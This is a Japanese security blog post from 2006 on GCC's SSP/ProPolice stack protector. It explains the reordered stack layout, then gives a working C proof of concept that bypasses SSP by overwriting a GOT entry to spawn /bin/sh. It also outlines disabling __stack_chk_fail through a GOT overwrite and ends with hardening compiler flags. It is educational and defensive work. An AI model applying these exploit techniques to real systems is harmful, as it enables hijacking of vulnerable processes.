memologue RSSフィード

書いている人

日記というよりは備忘録、ソフトウェア技術者の不定期メモ。あるいはバッドノウハウ集。プライベートで調査した細々した諸々のスナップショット。嘘が散りばめられています。ISO/IEC 14882(C++)とPOSIX, GCC, glibc, ELFの話ばかりで、WindowsやMacの話はありません。特に記載がなければLinux/x86とILP32が前提です。時間の経過と共に古い記事は埋もれてしまいます。検索エンジンから飛んできた場合は、ページ内検索をご利用いただくかgoogleキャッシュを閲覧してみてください。技術的な記事を書きためる場所として使っています。言及してもらえると喜びます。主要な記事の一覧を書いておきます:

にんきコンテンツ: [GCC] mainを一度も呼ばないばかりか蹂躙する / Binary2.0 Conference 2006 発表資料 / C++ で SICP / ついカッとなって実行バイナリにパッチ / hogetrace - 関数コールトレーサ

昔のPOSIX関係の記事: シグナルの送受に依存しない設計にしよう / シグナルハンドラで行ってよい処理を知ろう / マルチスレッドのプログラムでのforkはやめよう / スレッドの「非同期キャンセル」を行わない設計にしよう / スレッドの「遅延キャンセル」も出来る限り避けて通ろう / マルチスレッドプログラミングの「常識」を守ろう / C++でsynchronized methodを書くのは難しい / シグナルハンドラからのforkするのは安全か? / g++ の -fthreadsafe-statics ってオプション知ってます? / 非同期シグナルとanti-pattern / localtimeやstrtokは本当にスレッドセーフにできないのか / UNIXの規格について / マルチスレッドと共有変数 - volatile?なにそれ。 / type punning と strict aliasing / アセンブラで遊ぶ時に便利なgdb設定 / 最近の記事は一覧から

2006-06-25

書き終わる前に休日が終わってしまいました。あとで埋めます。

昨日に続き、リハビリです。

[] memo: SSP(ProPolice)を突破できるパターン?

GCCは4.1以降からデフォルトでSSP(a.k.a. ProPolice)というスタック保護の仕組みが搭載されています*1。この仕組みを使うと、スタック上に確保した配列のオーバーフローを実行時に検出できます。

% gcc -fstack-protector-all ssp_test.c
% ./a.out
*** stack smashing detected ***: ./a.out terminated
zsh: abort      ./a.out

この手のコンパイラに対するパッチはStackGuardを代表にいろいろあるんですが、SSPがもっとも高性能といわれてます。VC++の/GSよりも高性能です*2。ありがちな攻撃方法、たとえば、"Four different tricks to bypass StackShield and StackShield protection"の4つの手口は全部通用しません。


以前のものに比べてどの辺が改良されているか。詳しくはSSPのプレゼンテーションを見ていただくとして(説明する気0...)、簡単にまとめると、

  • リターンアドレスの改竄を検知できるのは当然として
  • saved frame pointer も改竄検知できる

のがまずgoodです。まぁ、ここまでは他のもそうだったりするんですが、SSPはそれに加え、

  1. ローカル変数を改竄できない
  2. 引数を改竄できない

という特性も備えているのですね。こっちがより重要なポイントです。普通、StackGuardなんかだと、(たとえば2引数の)関数呼び出し直後のスタックの状況は

[high] arg_2 arg_1 ret_addr saved_fp canary local_1 local_2 [low]

とかなってまして*3、local_2がchar配列で、オーバーフロー可能だとすると、オーバーフロー後、この関数から戻る _前_ に、改竄された local_1 や arg_1 や arg_2 *4、がうまいこと利用され、gotcha!! となるわけです。でも、SSPが有効だと、スタックのレイアウトが、

[high] ret_addr saved_fp canary local_2 arg_2 arg_1 local_1 [low]

のようになるわけですよ(イメージ)。ideal stack layout とか呼ばれています。argがスタックの成長方向(低いアドレス)に移動させられ、バイト配列である local_2 がカナリアの真横に移動させられます。上のような arg, local に対する攻撃(改竄)ができなくなってしまいます。

突破できそうなパターン3種


このように、かなりよいスタック保護を提供してくれるSSPなんですが、突破できる場合もあります。この土日で調べた範囲では、とりあえず次の3パターン。

  1. 二段以上の間接参照をしているケース
  2. 構造体のメンバのバイト配列がオーバーフローするケース
  3. バッファオーバーフロー以外のバグで、メモリ上の任意の4バイトを書き換え可能なケース

ほかにもあれば教えてください。あんまり思いつかず、かつWeb上にもあまり有用な資料がなくって、かろうじて見つかったのが2のみ。1/3は私の妄想によります。


順に。

[1] 二段以上の間接参照をしているケース


こんな例です。

static void shell() { system("/bin/sh"); } // 使われていない

static void vuln_(int** p, char** a) {
  char x[12];
  printf("x:%p p:%p dif:%d\n", x, p, (void*)p - (void*)x);

  strcpy(x, a[0]);                   // <-- (1)
  **p = strtoul(a[1], NULL, 16);     // <-- (2)
  puts("ok\n");                      // <-- (3)
}

void vuln(char** a) {
  int* p = malloc(sizeof(int));      // (4)
  vuln_(&p, a);
}

vuln_関数の引数pを、(2)の部分で二段間接参照(**p)しています。このプログラムは、次のように攻撃できます。

#define PAD10 "1234567890"

int main() {
  char* a[] = {
    PAD10 PAD10 PAD10 PAD10 PAD10 PAD10 "\x74\x98\x04\x08",  /* GOT address (puts) */
    "0x080484e4" /* shell() address */
  };
  vuln(a);
  return 0;
}

(1) で、遠く(60バイトほど)離れた(4)のポインタの指し先をputs関数用のGOTにし、(2)でGOTの値をshell関数のアドレスにし、(3) でshell関数に飛ぶようにしました。

% gcc -fstack-protector-all test.c
% ./a.out
x:0xffffc024 p:0xffffc060 dif:60
sh-3.1$ 

実行するとシェルが起動します。んま、こんなのはかなりのレアケースとおもうので、次にいきましょう。

(TODO:サンプルコードをもう少しマシにできないか)

[2] 構造体のメンバのバイト配列がオーバーフローするケース


2004年のBlackHat USAの資料に載ってました。構造体のメンバはreorderできないから、構造体があるとideal stack layoutを実現できないよね、みたいな話です。なるほどねー。


(あとで書く)

[3] バッファオーバーフロー以外のバグで、メモリ上の任意の4バイトを書き換え可能なケース


format string bug や heap overflow を利用して、GOTを書き換えると楽しいという話を数日前に書きましたが、具体的にはGOTのどのエントリを書き換えるとよいでしょうか? もちろん、ケースバイケースではあるんですが、__stack_chk_fail関数用のGOTエントリなんて如何でしょうかね? 的な話です。


__stack_chk_fail関数というのは、SSPがバッファオーバーフローを検出したときに呼ばれる関数で、中でちょろっとメッセージをwrite()して即abort()するだけの関数です。でもこの関数、libc.soの中に入ってまして、プログラムから呼ぶ場合はPLTを経由しちゃうんですよね。こんな感じ。

% cat ssp.c
#include <string.h>

void vuln(const char* s) {
  char x[10];
  strcpy(x, s);
}

int main() {
  vuln("1234567890");
  return 0;
}

% gcc -fstack-protector-all -o ssp_test ssp.c
% objdump -d ssp_test | less
080483f5 <vuln>:
 80483f5:       55                      push   %ebp
 80483f6:       89 e5                   mov    %esp,%ebp
..
 8048421:       65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 8048428:       74 05                   je     804842f <vuln+0x3a>
 804842a:       e8 c5 fe ff ff          call   80482f4 <__stack_chk_fail@plt>
 804842f:       c9                      leave
 8048430:       c3                      ret

ですので、GOT overwriteを利用して __stack_chk_fail のアドレスをどうでもいい関数のアドレス(例えば、<getpid@plt> とか)に書き換えることが可能であれば、SSPを無効にできます。泥棒する前に、とりあえず家主を眠らせとけ..みたいな(物騒ですが)。サンプルコードは、ほとんどこのGOT overwriteと一緒になってしまうから略。防御方法を書きます。

防御


以上3種類の攻撃から身を守る方法としては、SSPをPIEやRELROと併用するのが王道だろうと思います。でも、もしネタっぽい解決策がお好みなら、(3については)別の方法もあります。main関数の書いてあるソースコードに、次の内容を書き足してみてください。

// これを書き足す。x86/Linux用です。
void __stack_chk_fail() {
  // exitシステムコールを呼ぶだけ
  __asm__ ("mov $1, %eax; mov $1, %ebx; int $0x80");
}

すると、

% objdump -d ssp_sample | grep __stack__chk_fail
..
 80483cd:       e8 d2 ff ff ff          call   80483a4 <__stack_chk_fail>
..

こんな感じで、PLTを経由せずに自作の__stack_chk_failが呼ばれるようになります。自作の __stack_chk_fail の中ではインラインアセンブラで割込をかけてるだけですから、PLT経由で何かを呼び出したりということは(もちろん)ありません。

% objdump -d ssp_sample | grep -A 15 '<__stack_chk_fail>:'
080483a4 <__stack_chk_fail>:
 80483a4:       55                      push   %ebp
 80483a5:       89 e5                   mov    %esp,%ebp
 80483a7:       83 ec 18                sub    $0x18,%esp
 80483aa:       65 a1 14 00 00 00       mov    %gs:0x14,%eax
 80483b0:       89 45 fc                mov    %eax,0xfffffffc(%ebp)
 80483b3:       31 c0                   xor    %eax,%eax
 80483b5:       b8 01 00 00 00          mov    $0x1,%eax
 80483ba:       bb 01 00 00 00          mov    $0x1,%ebx
 80483bf:       cd 80                   int    $0x80
 80483c1:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80483c4:       65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 80483cb:       74 05                   je     80483d2 <__stack_chk_fail+0x2e>
 80483cd:       e8 d2 ff ff ff          call   80483a4 <__stack_chk_fail>
 80483d2:       c9                      leave
 80483d3:       c3                      ret

..再帰している気がするのは目の錯覚です。実害は...たぶんないでしょう。ちなみに、__stack_chk_fail()のインラインアセンブラ部分、ちょっと手抜きです。まともに書きたいひとはこれ(など)を参照のこと。

[] GOTをほげほげする NX+ASLR+PIE+SSP(ProPolice) の突破デモ


これの続きです。さて、

  • NXあり (exec-shield)
  • ASLRあり (exec-shield-randomize)
  • SSPあり
  • PIEあり
  • RELROなし
  • FORTIFY_SOURCEなし

という条件で、

  1. format string bug を利用して、PIEなバイナリが貼り付けられたアドレスを知り
  2. format string bug を利用して、<__stack_check_fail@plt>が参照しているGOTを塗りつぶしてSSPを無効にして
  3. stack based buffer overflow で return into libc して*5、shellをexecする

というのをやってみます。CTスキャンして(1.)、麻酔して(2.)、手術(3.)みたいな感じです。ほとんど檻脱出系のイリュージョンかなんかに近いですな...。


(あとで書く。もしうまくいかなければ没 :-)


対策


最近のFedoraのように、デフォルトで gcc -D_FORTIFY_SOURCE=2 を指定し、かつ(できるだけ) ld -z relro を指定するようにすれば、「このケースでは」かつ「私の知る限りでは」大丈夫そうです。


とりあえず、「NXだけで大丈夫」とか「NXとSSPで完璧さ!」とかいう風潮はどうかなー、ということで。ひとつ。

[] 結局どうすりゃいいのさ (攻撃されないCFLAGS/LDFLAGS)


最近のエントリの総まとめ。適当なネットワークデーモンなどを手動でmakeする際におすすめのgccのオプション。ソフトウェアにbuffer overflowをはじめとするありがちな欠陥があった場合でも、攻撃者にプロセスを乗っ取られないよう、コンパイラやカーネルで精一杯防御するためのCFLAGSとLDFLAGS。とりあえずFedora5以降を想定しています。


# 2006/6現在で私が把握しているものです。どんどん変化(進化)しますのでご注意。特にFedoraは。。

# 自分でフォローしたい場合、Hardened Gentooのページや、Fedoraのここは役立つと思います

基本


上記のように、「多少遅くなってもセキュアなバイナリ希望」という場合、もともとのCFLAGS/LDFLAGSに加えて、

CFLAGS=-fstack-protector-all -O2 -fno-strict-aliasing -D_FORTIFY_SOURCE=2
LDFLAGS=-Wl,-z,now,-z,relro 

とするのがいいんじゃないでしょうか。さらに、ライブラリを作っているのではなく、実行ファイルを作っている場合は、

CFLAGS=-fPIE
LDFLAGS=-pie

も追加してください。実行ファイル作成の際、ライブラリのスタティックリンクはなるべくやめましょう(自分で調整できるなら)。

味付け


スタックの使いかたを巷のプログラムとはひと味違うものにしておくと、script kiddyの攻撃をかわせる可能性が高まります。たぶん。次の -mpreferred-stack-boundary オプションも付け加えましょう。

CFLAGS=-mpreferred-stack-boundary=5

なお、5のところは、12以下であればもっと大きな値でもよいです。ただしあまり大きくするとスタックをすごく*6消費しますので、せいぜい5から7程度にしておくのが無難でしょう。


さらに、元々のMakefileに -fomit-frame-pointer と書いてあったらこれを取り去り、書いていなければこれを書き加えるのも手です。return to libc attackは、フレームポインタの有無で攻撃の戦略が結構変わりますので、このフレームポインタ有無をデフォルトから反転させることで script kiddy の(ry


品質の悪そうなプログラムは使いたくない、というなら、

CFLAGS=-Wformat=2 -Wstrict-aliasing=2

でコンパイルして、あんまり多くの警告がでる場合は使用をやめるとよいでしょう。ただし、冤罪(GCCの誤警告)の可能性もありますのでご注意。

# ほんとは、 -fvolatile なる逆最適化オプションも紹介しようと思っていたのだが、このオプションはGCC3.4から存在しなくなっていた..

仕上げ


最後に、全ての実行ファイルと共有ライブラリに対して、次を実行します。最終品質検査です。

% readelf -l 実行ファイルorライブラリ | grep GNU_STACK | grep RWE
% readelf -d 実行ファイルorライブラリ | grep TEXTREL

もし、どちらかの行の実行で、あるいは両方で、なんらかの出力があったら、その 実行ファイルor共有ライブラリ は使うのを控え、別のソフトを探すとよいかもしれません。わかってそういうことをしている可能性もあるので絶対ダメというわけではないですが。


以上、Exec-Shield(NXとASLR)がonになっているのは前提とします。最近のディストリビューションならそうなっていることでしょう。

いたずら


ELF Kickersというツールに含まれている sstrip というコマンドでバイナリをstripしておくと、binutilsで解析できない(が実行はできる)バイナリになります。気安め程度ですが、objdumpやreadelfされるのが嫌なら検討するとよいかも。最近のbinutilsでは読めたりして。未確認です。elfutilsで読めるかどうかも未確認。

実行時


(あとで書く) export MALLOC_CHECK_=2

[] return into libc アタックについて


(あとで書く..と思う)

  • Exec-Shield時代のスタンダードな攻撃だけど、日本語の資料が見当たらない(ので書く)
    • NXでもシェル起動は簡単
  • Phrack Magazineの記事はおもしろい
    • バイナリ中の任意の addl; ret; を "間借り" して、複数のcallをchainする話
    • 都合の良いのPLTが無いとき、"return into __dl_runtime_resolve" して、お好きな関数を無理やり呼ぶ話
  • randomize_va_spaceでランダム化されない部分と、PIEによる改善について
  • 防御

*1:それ以前のGCC向けにもpatchが存在します..というよりそのpatchが本家で、GCC4のはRedHatによる再実装

*2:Visual Studio 2005でSSPと同等になったという噂もあるが、私は未確認

*3:high/lowはアドレス

*4:特にこれらがpointerの場合においしい

*5:return into __dl_runtime_resolve のほうが格好いいんですが、面倒なのでパス

*6:O(N**2)で